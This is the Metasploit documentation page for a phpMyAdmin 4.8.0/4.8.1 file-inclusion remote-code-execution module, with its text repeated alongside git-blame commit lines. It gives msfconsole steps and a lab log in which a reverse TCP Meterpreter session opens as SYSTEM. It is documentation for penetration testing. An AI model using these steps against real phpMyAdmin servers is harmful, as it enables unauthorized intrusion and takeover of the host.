documentation/modules/exploit/multi/http/phpmyadmin_lfi_rce.md

## Description

phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion, which can be exploited post-authentication to execute PHP code by application. The module has been tested with phpMyAdmin v4.8.1.

## Vulnerable Application

[phpMyAdmin v4.8.1](https://files.phpmyadmin.net/phpMyAdmin/4.8.1/phpMyAdmin-4.8.1-all-languages.zip) and v4.8.0

## Verification Steps

1. `./msfconsole -q`
2. `use exploit/multi/http/phpmyadmin_lfi_rce`
3. `set rhosts <rhost>`
4. `run`

## Scenarios

### Tested on Windows 7 x64 using PHP 7.2.4 and phpMyAdmin 4.8.1

```
msf5 > use exploit/multi/http/phpmyadmin_lfi_rce
msf5 exploit(multi/http/phpmyadmin_lfi_rce) > set rhosts 172.22.222.122
rhosts => 172.22.222.122
msf5 exploit(multi/http/phpmyadmin_lfi_rce) > run

[*] Started reverse TCP handler on 172.22.222.190:4444
[*] Sending stage (37775 bytes) to 172.22.222.122
[*] Meterpreter session 1 opened (172.22.222.190:4444 -> 172.22.222.122:51999) at 2018-07-05 13:14:39 -0500

meterpreter > getuid
Server username: SYSTEM (0)
meterpreter > sysinfo
Computer    :
OS          : Windows NT 6.1 build 7601 (Windows 7 Professional Edition Service Pack 1) i586
Meterpreter : php/windows
meterpreter >
```
Add phpMyAdmin v4.8.1/4.8.0 LFI RCE 2018-07-05 13:26:27 -05:00			`## Description`

Add Targets and Session file inclusion 2018-07-06 12:17:26 -05:00			`phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion, which can be exploited post-authentication to execute PHP code by application. The module has been tested with phpMyAdmin v4.8.1.`
Add phpMyAdmin v4.8.1/4.8.0 LFI RCE 2018-07-05 13:26:27 -05:00
			`## Vulnerable Application`

			`[phpMyAdmin v4.8.1](https://files.phpmyadmin.net/phpMyAdmin/4.8.1/phpMyAdmin-4.8.1-all-languages.zip) and v4.8.0`

			`## Verification Steps`

			1. `./msfconsole -q`
			2. `use exploit/multi/http/phpmyadmin_lfi_rce`
			3. `set rhosts <rhost>`
			4. `run`

			`## Scenarios`

			`### Tested on Windows 7 x64 using PHP 7.2.4 and phpMyAdmin 4.8.1`

			```
			`msf5 > use exploit/multi/http/phpmyadmin_lfi_rce`
			`msf5 exploit(multi/http/phpmyadmin_lfi_rce) > set rhosts 172.22.222.122`
			`rhosts => 172.22.222.122`
			`msf5 exploit(multi/http/phpmyadmin_lfi_rce) > run`

			`[*] Started reverse TCP handler on 172.22.222.190:4444`
			`[*] Sending stage (37775 bytes) to 172.22.222.122`
			`[*] Meterpreter session 1 opened (172.22.222.190:4444 -> 172.22.222.122:51999) at 2018-07-05 13:14:39 -0500`

			`meterpreter > getuid`
			`Server username: SYSTEM (0)`
			`meterpreter > sysinfo`
			`Computer :`
			`OS : Windows NT 6.1 build 7601 (Windows 7 Professional Edition Service Pack 1) i586`
			`Meterpreter : php/windows`
			`meterpreter >`
			```